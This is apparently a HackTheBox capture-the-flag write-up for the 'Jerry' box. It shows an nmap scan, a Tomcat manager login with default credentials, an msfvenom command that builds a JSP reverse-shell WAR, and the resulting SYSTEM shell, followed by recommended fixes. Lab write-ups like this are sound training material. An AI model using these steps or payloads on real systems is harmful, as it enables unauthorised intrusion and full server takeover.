Jerry is quite possibly the easiest box I’ve done on HackTheBox. There’s a Tomcat install with a default password for the Web Application Manager. I used that to upload a malicious war file ...
Vulnerability Exploited: Broken Authentication
System Vulnerable: 10.10.10.95
Vulnerability Explanation: On this server, there was an exposed port that was running Apache Tomcat. The administrator had used default credentials for the manager interface. This allows the attacker to access the interface and deploy a war file that gave us access to the server. Since default credentials are publicly available and can be easily obtained.
Vulnerability Fix: The administrator should have instead used a sufficiently long password that is difficult to crack.
Privilege Escalation Vulnerability: Least Privilege Violation
Vulnerability Fix: Tomcat doesn’t need SYSTEM privileges to function properly. Instead, it should have been run under a tomcat user account that has limited privileges. This way, even if we did get access to the box, we would have needed to find a way to escalate privileges, instead of immediately getting SYSTEM access without having to work for it. The administrator should have conformed to the principle of least privilege.
Severity: Critical
An initial Nmap scan revealed the Apache Tomcat Service on the 8080 port.
# Nmap 7.92 scan initiated Sun Dec 12 02:49:08 2021 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.088s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 12 02:49:32 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
The initial page of Apache Tomcat/7.0.88
Visiting the Manager App, using the default credentials: tomcat:s3cret
Create a reverse shell payload using msfvenom and save it on shell.war
┌──(root💀kali)-[/root/HTB/windows/jerry]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.8 LPORT=9001 -f war > shell.war
Payload size: 1100 bytes
Final size of war file: 1100 bytes
Upload the shell.war on the web application
Launch a nc listener on the local machine and visit the /shell file on the web application:
Receiving a reverse shell as NT AUTHORITY\SSYTEM
┌──(root💀kali)-[/root/HTB/windows/jerry]
└─# nc -nvlp 9001 1 ⨯
listening on [any] 9001 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.95] 51432
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>
user.txt & root.txt
The proof of user and root are stored on the same file called “2 for the price of 1.txt”
